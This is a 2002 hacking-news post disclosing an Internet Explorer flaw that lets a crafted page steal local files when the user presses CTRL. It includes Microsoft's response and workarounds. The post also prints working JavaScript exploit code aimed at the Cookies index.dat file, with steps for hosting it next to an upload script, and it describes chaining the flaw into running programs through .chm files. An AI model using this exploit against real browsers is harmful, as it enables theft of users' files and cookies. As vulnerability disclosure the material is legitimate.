Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Pressing CTRL in IE is dangerous

Pressing CTRL in IE is dangerous

by Nikola Strahija on July 24th, 2002 Pressing CTRL in IE may result in arbitrary local file to be uploaded to a remote server (no exact path needed). If special sensitive information is uploaded, it may be used to run remote programs.


Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does not meet the bar of a security vulnerability. We will not be releasing a hotfix or patch for this issue."

They proposed the following possible workarounds:
1. disable or set to prompt - "Submit nonencrypted form data" option
2. disable "allow paste operations via script" (best)
3. disable active scripting

DESCRIPTION:
============

A special crafted webpage can retrieve any local file using simple javascript. This is possible by performing the following steps:

1. When an user presses the CTRL key an onkeydown event can be set to fire. In the event function the key pressed is changed to 'V'. The result will be a paste operation with less restrictions.

2. The content of the clipboard is altered and focus is changed to a hidden file upload form. The paste operation will be performed into the form, yielding a change of value for the file upload field (not normally allowed).

3. The upload form is submited automaticly (legal javascript operation).

It isn't necessary to know the exact path to local files because it's possible to refer to a file with "..filename".

Further on, if the local file "..LOCALS~1TEMPOR~1CONTENT.IE5index.dat" is uploaded, then the random directories needed to get the exact path to the temporarily internet folders can be retrieved. Knowing the exact path a compiled help file .chm can be dumped and launched with showHelp() (old
.chm attack). The compiled help file is allowed to have instructions to execute arbitrary programs.


EXPLOIT:
========

Instructions:
Put the html code in a remote html document and load it with Internet Explorer. Activate the exploit by pressing CTRL. You must prepare a server side script to take care of the upload process ("upload.php"). If you choose to use php I recommend http://www.php.net/manual/en/features.file-upload.php as a reference on how to setup a server side script taking care of a file upload.

Note:
1. Please remove all "!" characters in the exploit code. They have been inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.

Exploit:
-------------------------- CUT HERE -------------------------------


</div>

//uploadFile="..LOCALS~1TEMPOR~1CONTENT.IE5index.dat";
uploadFile="..Cookiesindex.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};

-------------------------- CUT HERE -------------------------------


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »